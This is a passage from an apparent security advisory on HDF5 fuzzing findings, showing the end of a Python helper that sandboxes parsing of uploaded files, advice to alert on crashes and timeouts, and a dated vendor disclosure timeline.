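    return "ok", proc.stdout.decode(errors="replace")


def scan_bytes(data: bytes, **kwargs) -> Tuple[str, str]:
    """Stage an in-memory upload in a private temp file and scan it."""
    with tempfile.NamedTemporaryFile(suffix=".h5") as tmp:
        tmp.write(data)
        tmp.flush()
        return parse_in_sandbox(tmp.name, **kwargs)
```

A "crashed" or "timeout" status is worth alerting on: against a library with the crash density reported above, those outcomes are a signal that someone is feeding the service malformed files rather than ordinary bad data.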

Timeline

19/06/2023 - Initial contact with HDFGroup help desk - help desk requests creation of GitHub issues - Pulse Security responds explaining that the security issues will become public immediately once issues are created
20/06/2023 - Request for update - HDFGroup advise technical staff will be in touch to accept technical details
28/06/2023 - Request for update
29/06/2023 - Contact from HDFGroup technical staff, request for advisory details and trial of new GitHub security issues.
30/06/2023 - Advisory details sent to HDFGroup technical staff
12/07/2023 - Request for update and advisory acknowledgement
17/07/2023 - Advisory confirmed by HDFGroup technical staff
25/07/2023 - Trial GitHub security issues created on https://github.com/HDFGroup/hdf5/
18/08/2023 - Request for update
13/09/2023 - Request for update
17/09/2023 - HDFGroup technical staff advise other aspects of the project have taken priority over addressing memory corruption vulnerabilities found through this fuzzing process
20/09/2023 - Advisory release
